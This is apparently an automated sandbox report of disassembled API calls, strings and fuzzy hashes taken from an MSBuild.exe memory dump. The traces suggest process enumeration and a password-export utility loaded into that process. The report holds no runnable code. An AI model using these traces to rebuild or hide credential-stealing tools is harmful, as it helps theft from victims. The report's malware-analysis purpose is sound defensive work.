                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID: ---
                                                                                                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                                                                                                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1010922700-0
                                                                                                                                                                                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                                                                                                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2012295524-70141382
                                                                                                                                                                                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1700100422-0
                                                                                                                                                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 552707033-0
                                                                                                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                    • String ID: 4$h
                                                                                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                                                                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 290601579-0
                                                                                                                                                                                    • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                                                                                                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                    • String ID: %s (%s)$YV@
                                                                                                                                                                                    • API String ID: 3979103747-598926743
                                                                                                                                                                                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
